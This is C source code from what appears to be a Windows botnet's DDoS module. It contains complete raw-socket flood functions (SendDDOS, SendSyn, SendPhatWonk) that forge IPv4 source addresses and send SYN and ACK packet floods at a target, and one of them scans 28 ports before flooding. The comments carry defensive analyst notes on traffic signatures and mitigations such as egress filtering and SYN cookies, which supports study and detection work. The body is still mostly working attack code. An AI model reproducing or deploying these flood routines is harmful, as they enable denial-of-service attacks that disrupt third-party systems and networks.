    // flags and ack_seq are left uninitialized.
    if (strcmp(Type,"ddos.syn") == 0) {
        tcpHeader.ack_seq=0;
        tcpHeader.flags=SYN;
    } else if (strcmp(Type,"ddos.ack") == 0) {
        tcpHeader.ack_seq=0;
        tcpHeader.flags=ACK;
    } else if (strcmp(Type,"ddos.random") == 0) {
        tcpHeader.ack_seq=rand()%3;
        if (rand()%2 == 0)
            tcpHeader.flags=SYN;
        else
            tcpHeader.flags=ACK;
    }

    tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
    tcpHeader.window=fhtons(16384);
    tcpHeader.urg_ptr=0;

    long total = 0;

    // Deadline in performance-counter ticks: now + len seconds.
    QueryPerformanceFrequency(&freq);
    QueryPerformanceCounter(&cur);
    halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;

    while(TRUE) {
        tcpHeader.checksum=0;
        tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
        tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));

        // Sequentially increasing forged source address.
        ipHeader.sourceIP=fhtonl(SpoofingIP++);

        // TCP checksum over pseudo-header + TCP header, staged in szSendBuf.
        psdHeader.daddr=ipHeader.destIP;
        psdHeader.zero=0;
        psdHeader.proto=IPPROTO_TCP;
        psdHeader.length=fhtons(sizeof(tcpHeader));
        psdHeader.saddr=ipHeader.sourceIP;
        memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
        memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));

        tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));

        // The buffer is then overwritten with the real packet and the IP
        // checksum computed over both headers as laid out.
        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
        ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

        rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in));
        if (rect==SOCKET_ERROR) {
            sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError());
            addlog(buf);

            fclosesocket(sock);
            fWSACleanup();
            return 0;
        }

        total += rect;
        QueryPerformanceCounter(&cur);
        if (cur.QuadPart >= halt_time.QuadPart)
            break;
    }

    fclosesocket(sock);
    fWSACleanup();

    return (total);
}
// Raw-socket SYN flood worker: sends hand-built IPv4/TCP SYN packets to
// TargetIP:TargetPort for len seconds and returns the number of bytes that
// sendto() reported.
//
// TargetIP is used as given in the IP header and sockaddr (presumably network
// byte order -- confirm at the call site). SpoofingIP is the first forged
// source address; it is converted with htonl and incremented once per packet.
// Returns FALSE (0) if Winsock or socket setup fails and 0 on the first send
// error; otherwise the byte total.
//
// Analyst notes (defensive):
//  - Same packet template as SendDDOS with the flags byte fixed at 2 (SYN):
//    source addresses increasing by one per packet, source port in 1000..2000,
//    window 16384, IP ident 1, TTL 128, no TCP options.
//  - Every packet carries a forged source, so egress filtering (BCP 38) at the
//    infected host's network stops it; SYN cookies and half-open connection
//    limits are the receiving-side mitigations.
//  - Only send errors are logged ("[SYN]: Send error: <n>."), via addlog().
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len)
{
    IPHEADER ipHeader;
    TCPHEADER tcpHeader;
    PSDHEADER psdHeader;

    LARGE_INTEGER freq, halt_time, cur;
    char szSendBuf[60]={0},buf[64];
    int rect;

    WSADATA WSAData;
    if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0)
        return FALSE;

    SOCKET sock;
    if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {
        fWSACleanup();
        return FALSE;
    }

    // IP_HDRINCL: the caller supplies the IP header, including the source.
    BOOL flag=TRUE;
    if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
        fclosesocket(sock);
        fWSACleanup();
        return FALSE;
    }

    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family=AF_INET;
    ssin.sin_port=fhtons(TargetPort);
    ssin.sin_addr.s_addr=TargetIP;

    ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
    ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
    ipHeader.ident=1;
    ipHeader.frag_and_flags=0;
    ipHeader.ttl=128;
    ipHeader.proto=IPPROTO_TCP;
    ipHeader.checksum=0;
    ipHeader.destIP=TargetIP;

    tcpHeader.dport=fhtons(TargetPort);
    tcpHeader.ack_seq=0;
    tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
    tcpHeader.flags=2; // SYN bit of the TCP flags byte
    tcpHeader.window=fhtons(16384);
    tcpHeader.urg_ptr=0;

    long total = 0;

    // Deadline in performance-counter ticks: now + len seconds.
    QueryPerformanceFrequency(&freq);
    QueryPerformanceCounter(&cur);
    halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;

    while (1) {
        tcpHeader.checksum=0;
        tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
        tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));

        // Sequentially increasing forged source address.
        ipHeader.sourceIP=fhtonl(SpoofingIP++);

        // TCP checksum over pseudo-header + TCP header, staged in szSendBuf.
        psdHeader.daddr=ipHeader.destIP;
        psdHeader.zero=0;
        psdHeader.proto=IPPROTO_TCP;
        psdHeader.length=fhtons(sizeof(tcpHeader));
        psdHeader.saddr=ipHeader.sourceIP;
        memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
        memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));

        tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));

        // The buffer is then overwritten with the real packet and the IP
        // checksum computed over both headers as laid out.
        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
        ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

        rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
        if (rect==SOCKET_ERROR) {
            sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError());
            addlog(buf);

            fclosesocket(sock);
            fWSACleanup();
            return 0;
        }

        total += rect;
        QueryPerformanceCounter(&cur);
        if (cur.QuadPart >= halt_time.QuadPart)
            break;
    }

    fclosesocket(sock);
    fWSACleanup();

    return (total);
}
// Combined port probe and raw-socket TCP flood worker. It first tries a TCP
// connect() to a fixed list of 28 ports on TargetIP, then sends bursts of one
// SYN followed by ACK segments for about len seconds, sleeping delay ms between
// bursts.
//
// Returns a pointer to a static buffer holding the space-separated list of
// ports that accepted the connect probe. The buffer is shared by all callers
// and overwritten on every call.
//
// The function reads and writes several names that are not declared here
// (sock, packet, cksum, s_in, spoofing, spoof); they are presumably file-level
// globals -- confirm in the rest of the file.
//
// Analyst notes (defensive):
//  - Precursor: 28 ordinary TCP connection attempts from the infected host to
//    the port list below, each with a 3 s timeout, come before any flood
//    traffic and are visible in flow logs.
//  - Flood signature: IP TOS 0x08, TTL 255, window 16384, data offset 5, one
//    SYN then a run of ACKs with the same source port and destination port.
//  - The source address comes from spoofip(TargetIP) or from the configured
//    spoof string; in both cases egress filtering (BCP 38) on the infected
//    host's network is the control that stops it.
char* SendPhatWonk(unsigned long TargetIP, unsigned int len, int delay)
{
    BOOL flag=TRUE;
    unsigned long lTimerCount=0;
    struct timespec ts; // set inside the loop but never read
    int i=0;
    struct sockaddr_in addr;
    int scansock=0;

    // NOTE(review): neither call's result is checked, and this is the only
    // Winsock call in the visible functions made without the f-prefixed
    // wrapper.
    sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
    fsetsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char*)&flag, sizeof(flag));

    srand(GetTickCount());

    // Ports tried with a full TCP connect before the flood starts.
    unsigned int port[28] = {
        1025,21,22,23,25,53,80,81,88,110,113,119,135,
        137,139,143,443,445,1024,1433,1500,
        1720,3306,3389,5000,6667,8000,8080
    };
    unsigned int openport[28] = {0,0,0};
    static char hitports[1024] = "";
    int hitport=0, lastport=0;
    char tmpMess[]="";

    struct timeval working_timeout;
    working_timeout.tv_sec = 3;
    working_timeout.tv_usec = 3000;

    // Phase 1: connect probe of each listed port; remember the ones that
    // answered.
    for (i=0;i<28;i++) {
        addr.sin_family = AF_INET;
        addr.sin_addr.s_addr = TargetIP;
        addr.sin_port = fhtons(port[i]);
        scansock = fsocket(AF_INET,SOCK_STREAM,0);
        int result = connect_no_timeout(scansock,(struct sockaddr *)&addr,sizeof(struct sockaddr),&working_timeout);
        fclosesocket(scansock);
        if(result == 0) {
            openport[i] = port[i];
        }
    }

    sprintf(hitports, " ");
    lTimerCount=GetTickCount();

    // Build the report string. hitport is overwritten on every iteration, so
    // only the value from the last iteration reaches the packet template
    // below. NOTE(review): the open-port branch stores a host-order port while
    // the fallback stores a network-order one, and the sprintf below uses
    // hitports as both destination and source argument (overlapping buffers).
    for (i=0;i<28;i++) {
        if ((GetTickCount()-lTimerCount)/1000>len)
            break;
        if (openport[i] != 0) {
            hitport = openport[i];
            //hitports.Format("%s%d ",hitports.CStr(),hitport);
            sprintf(hitports, "%s%d ", hitports, hitport);
        } else {
            hitport = fhtons (brandom (0, 65535)); // no open ports
        }
    }

    // Phase 2: send bursts until len seconds have passed since lTimerCount.
    for (;;) {
        memset(&packet, 0, sizeof(packet));

        ts.tv_sec = 0;
        ts.tv_nsec = 10;

        packet.ip.ihl = 5;
        packet.ip.ver = 4;
        packet.ip.pro = IPPROTO_TCP;
        packet.ip.tos = 0x08;
        packet.ip.id = fhtons (brandom (1024, 65535));
        packet.ip.tl = fhtons(sizeof(packet));
        packet.ip.off = 0;
        packet.ip.ttl = 255;
        if (!spoofing)
            packet.ip.src = spoofip(TargetIP);
        else
            packet.ip.src = finet_addr(spoof);
        packet.ip.dst = TargetIP;

        packet.tcp.flg = 0;
        packet.tcp.win = fhtons(16384);
        packet.tcp.seq = fhtonl (brandom (0, 65535) + (brandom (0, 65535) << 8));
        packet.tcp.ack = 0;
        packet.tcp.off = 5;
        packet.tcp.urp = 0;
        packet.tcp.dst = hitport;

        // Pseudo-header used for the TCP checksum.
        cksum.pseudo.daddr = TargetIP;
        cksum.pseudo.mbz = 0;
        cksum.pseudo.ptcl = IPPROTO_TCP;
        cksum.pseudo.tcpl = fhtons(sizeof(struct xtcphdr));

        s_in.sin_family = AF_INET;
        s_in.sin_addr.s_addr = TargetIP;
        s_in.sin_port = packet.tcp.dst;

        // The loop runs for i = 0..1022, i.e. one SYN and 1022 ACKs per burst.
        for(i=0;i<1023;++i) {
            /* send 1 syn packet + 1023 ACK packets. */
            if(i==0) {
                packet.tcp.src = fhtons (brandom (0, 65535));
                cksum.pseudo.saddr = packet.ip.src;
                packet.tcp.flg = SYN;
                packet.tcp.ack = 0;
            } else {
                packet.tcp.flg = ACK;
                packet.tcp.ack = fhtons (brandom (0, 65535));
            }

            // IP id and TCP sequence advance by one per packet within a burst.
            ++packet.ip.id;
            ++packet.tcp.seq;

            s_in.sin_port = packet.tcp.dst;

            packet.ip.sum = 0;
            packet.tcp.sum = 0;

            cksum.tcp = packet.tcp;

            packet.ip.sum = checksum((unsigned short *)&packet.ip, 20);
            packet.tcp.sum = checksum((unsigned short *)&cksum, sizeof(cksum));

            fsendto(sock, (const char *)&packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in));
        }

        if((GetTickCount()-lTimerCount)/1000>len)
            break;
        Sleep(delay);
    }

    // NOTE(review): the raw socket opened at the top is not closed here.
    return hitports;
}